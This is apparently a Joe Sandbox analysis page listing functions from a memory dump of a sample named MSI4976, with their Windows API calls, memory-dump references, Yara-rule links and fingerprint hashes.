                                        Function 003238E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0039454E
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _memset.LIBCMT ref: 00323965
                                        • _wcscpy.LIBCMT ref: 003239B5
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003239C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: 699ee55b654e8e76c685ce87c3c903a75fe2767b3c801c43d2df970a78f088f0
                                        • Instruction ID: a9b28135b01f0a1471815f536e58527558b909eeb9a9a7f3f979d83e457be104
                                        • Opcode Fuzzy Hash: 699ee55b654e8e76c685ce87c3c903a75fe2767b3c801c43d2df970a78f088f0
                                        • Instruction Fuzzy Hash: 38318171409350ABD723EB60EC45FDBB7ECAF55310F40461AF1859A1A1DB74AA88CB92
                                        Function 00388EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00388F69
                                        • LoadLibraryW.KERNEL32(?), ref: 00388F70
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00388F85
                                        • DestroyWindow.USER32(?), ref: 00388F8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: b037785234f62461c673036c67c4b1fa4ee86d17a04ad09ec682be826e4b13b7
                                        • Instruction ID: 541b20fbba8ddcc9b9f9d404c00f767636efce446e42776c58c92d1a014ff0a3
                                        • Opcode Fuzzy Hash: b037785234f62461c673036c67c4b1fa4ee86d17a04ad09ec682be826e4b13b7
                                        • Instruction Fuzzy Hash: 6621B871200305AFEF126F64EC80EBB37AEEB09324F914668FB5597190CB31DC929760
                                        Function 0036E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036E392
                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0036E3E6
                                        • __swprintf.LIBCMT ref: 0036E3FF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,003BDBF0), ref: 0036E43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: 8040d4c01882444613828b1e59dd8d13a593adadcf6ed9bfc6ba25a02d92a2a5
                                        • Instruction ID: 23925d8908026ab081e2835f454feb9b86260cc4ee4dc16ba5a5398b2c787b13
                                        • Opcode Fuzzy Hash: 8040d4c01882444613828b1e59dd8d13a593adadcf6ed9bfc6ba25a02d92a2a5
                                        • Instruction Fuzzy Hash: F1214F79A40108AFCB11EFA5DC85EEE7BB8EF49714F108069F50AEB251D631DA05CB51
                                        Function 0035D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                          • Part of subcall function 0035D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0035D640
                                          • Part of subcall function 0035D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0035D653
                                          • Part of subcall function 0035D623: GetCurrentThreadId.KERNEL32 ref: 0035D65A
                                          • Part of subcall function 0035D623: AttachThreadInput.USER32(00000000), ref: 0035D661
                                        • GetFocus.USER32 ref: 0035D7FB
                                          • Part of subcall function 0035D66C: GetParent.USER32(?), ref: 0035D67A
                                        • GetClassNameW.USER32(?,?,00000100), ref: 0035D844
                                        • EnumChildWindows.USER32(?,0035D8BA), ref: 0035D86C
                                        • __swprintf.LIBCMT ref: 0035D886
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: 5dbb1406bd2f44d78a589d9de809ba598433246b3496028d6630bd7a507495a7
                                        • Instruction ID: 904cdc1251de99e12e5c250741937cb81f38a70fb334cd8b55930adec09fdf19
                                        • Opcode Fuzzy Hash: 5dbb1406bd2f44d78a589d9de809ba598433246b3496028d6630bd7a507495a7
                                        • Instruction Fuzzy Hash: 651181755002056BDF23BFA09C86FEA376DAB44705F0040B9FE09AE1A6DBB499498B70
                                        Function 0033C619 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                        • GetStockObject.GDI32(00000011), ref: 0033C66B
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID: @U=u
                                        • API String ID: 3970641297-2594219639
                                        • Opcode ID: ee5755f5714ec0248193c45ff009c7dcbbaab36bdc9cb0dd50d3157e2bfefda1
                                        • Instruction ID: f24608eb51b733ac7ffa70d83a8435e1d5671776d5b7a79eed5be4a57a45e610
                                        • Opcode Fuzzy Hash: ee5755f5714ec0248193c45ff009c7dcbbaab36bdc9cb0dd50d3157e2bfefda1
                                        • Instruction Fuzzy Hash: D811C072511658BFDF134FA09C81EEABB6DFF09364F0A2215FA05A6120C732DC60DBA0
                                        Function 00381836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003818E4
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00381917
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00381A3A
                                        • CloseHandle.KERNEL32(?), ref: 00381AB0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: a442fcb521e0168a74e88c3c038b6b23a67192f2d625832a5e1b89ca837c8f25
                                        • Instruction ID: b6e7ce846b9e9c29ecbc1903b91b18b49cdb80e9903c6e4f57db56fd70597a99
                                        • Opcode Fuzzy Hash: a442fcb521e0168a74e88c3c038b6b23a67192f2d625832a5e1b89ca837c8f25
                                        • Instruction Fuzzy Hash: D381A571A00314ABDF15EF64C886BADBBF9AF44720F158059F905AF382D7B8ED418B90
                                        Function 00380579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003805DF
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0038066E
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0038068C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003806D2
                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003806EC
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                          • Part of subcall function 0033F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: 2870532365cba2900b357565ab3ff27b510af7cac42450492f58df30d062cfb6
                                        • Instruction ID: 8df5bcbf652f70b654b7711d398c4004b5aff925c64e375d1b47cf60cc42c154
                                        • Opcode Fuzzy Hash: 2870532365cba2900b357565ab3ff27b510af7cac42450492f58df30d062cfb6
                                        • Instruction Fuzzy Hash: F0518A75A00215DFCB06EFA8D4909EDB7B8FF49310F1580A5E946AB352EB30ED09CB90
                                        Function 00382D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382DE0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00382E1F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00382E66
                                        • RegCloseKey.ADVAPI32(?,?), ref: 00382E92
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00382E9F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: c4474c50371a77305eac74ccdb963ca20745451ed764c7f5aac226545fc0758f
                                        • Instruction ID: ea1858f0df3262ffc34fdf8381890ae756897085df9112baaa832306c8127e95
                                        • Opcode Fuzzy Hash: c4474c50371a77305eac74ccdb963ca20745451ed764c7f5aac226545fc0758f
                                        • Instruction Fuzzy Hash: A0515A71214304AFC706EF64D881E6BB7E8BF88704F04895DF5968B2A1EB31E905CB52
                                        Function 00371726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003717D4
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003717FD
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0037183C
                                          • Part of subcall function 003284A6: __swprintf.LIBCMT ref: 003284E5
                                          • Part of subcall function 003284A6: __itow.LIBCMT ref: 00328519
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00371861
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00371869
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: f8d3c3047091fc942f0825f065c5d91e4506c9fb7b460c102ede290c9d0fd8b5
                                        • Instruction ID: 3c0b8e2cad9c4b6f554a8e4620f449b984b4cdb50fd3f85254f48626003ecdf5
                                        • Opcode Fuzzy Hash: f8d3c3047091fc942f0825f065c5d91e4506c9fb7b460c102ede290c9d0fd8b5
                                        • Instruction Fuzzy Hash: 33411A35A00215EFCB12EF65C991AADBBF5EF49310B14C099E80AAF362DB35ED01DB51
                                        Function 0033B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(000000FF), ref: 0033B749
                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                        • GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                        • GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: 0e5df04a49adf356c437301c905359bbf520f6933d19180894d65ec2610b560c
                                        • Instruction ID: 4d3d00ebdaab1218ae8b823280fd2922ad593c859790214c19a22f0eaaacc744
                                        • Opcode Fuzzy Hash: 0e5df04a49adf356c437301c905359bbf520f6933d19180894d65ec2610b560c
                                        • Instruction Fuzzy Hash: 48413B75904219FFDF16DF64C884AEAFBB8FF45364F204359F82996290C730A990DBA1
                                        Function 0035C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 0035C156
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0035C200
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0035C208
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0035C216
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0035C21E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: bfaa2b53519a9be26f9da5fbdc719f13bc0dd7a30e0abe76415576357585398d
                                        • Instruction ID: 924696d5d239ed27825f5b14b9096f7a9eb51d16aee364d06c90bb167e184be0
                                        • Opcode Fuzzy Hash: bfaa2b53519a9be26f9da5fbdc719f13bc0dd7a30e0abe76415576357585398d
                                        • Instruction Fuzzy Hash: 6831C071500619EFDF05CFA8DD4CA9E3BB9EB0531AF114214FC21AA1E1C7B09A08CB90
                                        Function 0038DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038DCC0
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0038DCE4
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0038DCFC
                                        • GetSystemMetrics.USER32(00000004), ref: 0038DD24
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0037407D,00000000), ref: 0038DD42
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: 0376d00922445868690dc77c6a7f21eb5b440eaa925880c22928dd50a4d88020
                                        • Instruction ID: 123c7f5e66e552ed9e4a55e6e562a5f0feb3ce71fe271c295744d303c3d98cf6
                                        • Opcode Fuzzy Hash: 0376d00922445868690dc77c6a7f21eb5b440eaa925880c22928dd50a4d88020
                                        • Instruction Fuzzy Hash: 9221C171604321AFCB226F799C88B6977A9FF46365F110724F926C69E0E7709C14CB90
                                        Function 003789AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 003789CE
                                        • GetForegroundWindow.USER32 ref: 003789E5
                                        • GetDC.USER32(00000000), ref: 00378A21
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00378A2D
                                        • ReleaseDC.USER32(00000000,00000003), ref: 00378A68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 649c33d57f31ccfd94b9b8533900954e28a5c4b6823641b36ba45c1dc73b250a
                                        • Instruction ID: d75cd5f61b81f731d4b7c698597cf99986c6bec4f2aa5cfa8e4ccb3ac058ea8d
                                        • Opcode Fuzzy Hash: 649c33d57f31ccfd94b9b8533900954e28a5c4b6823641b36ba45c1dc73b250a
                                        • Instruction Fuzzy Hash: 40219276A00200AFDB15EF65D889AAABBF9EF45300F04C478E94ADB761DB74AD40CB50
                                        Function 0033B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0033B5EB
                                        • SelectObject.GDI32(?,00000000), ref: 0033B5FA
                                        • BeginPath.GDI32(?), ref: 0033B611
                                        • SelectObject.GDI32(?,00000000), ref: 0033B63B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
